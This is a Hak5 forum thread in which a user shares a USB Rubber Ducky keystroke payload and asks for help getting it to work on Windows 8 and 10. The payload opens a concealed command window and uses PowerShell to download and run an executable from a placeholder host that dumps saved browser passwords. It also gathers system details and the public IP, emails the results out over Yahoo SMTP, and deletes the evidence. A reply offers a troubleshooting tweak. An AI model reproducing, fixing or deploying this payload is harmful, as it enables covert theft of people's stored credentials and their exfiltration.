Jump to content
Hak5 Forums
Robert.sz

grab browsers password

Recommended Posts

Hello I'm wondering if it is possible to use if and else statement with rubber ducky.

I try to make a payload to grab browsers passwords and sent it to a mail. but in windows 7 works and in windows 8 and 10 dosen't work.

Here is my payload :

DELAY 1000
GUI r
DELAY 500
STRING cmd /T:01 /K \"@echo
ENTER
DELAY 500
STRING mode con:cols=15 lines=1
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe');
ENTER
DELAY 500
STRING cd %tmp%
ENTER
DELAY 500
STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt
DELAY 500
ENTER
STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt
ENTER
DELAY 500
STRING start web.exe /stext pwd.txt
ENTER
DELAY 500
REM -------------email log
STRING powershell
ENTER
DELAY 500
STRING $SMTPServer = 'smtp.mail.yahoo.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'user@yahoo.com'
ENTER
STRING $ReportEmail.To.Add('user2@yahoo.com')
ENTER
STRING $ReportEmail.Subject = 'Duck Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('pwd.txt')
ENTER
STRING $ReportEmail.Attachments.Add('info.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 500
REM ---------------------delete and end
STRING del web.exe
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING del pwd.txt
ENTER
DELAY 500
STRING del info.txt
ENTER
DELAY 100
STRING exit
ENTER

My problem is this line " STRING start web.exe /stext pwd.txt " doesn't  work on windows 8 and 10 only on in windows 7.

I try to do in this way " STRING start web.exe /stext > pwd.txt  " it create a pw.txt but it is empty.

Any idea it is appreciated !

Share this post


Link to post
Share on other sites

What if you more specific with the browser? try using chrome.exe /stext > pwd.txt

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×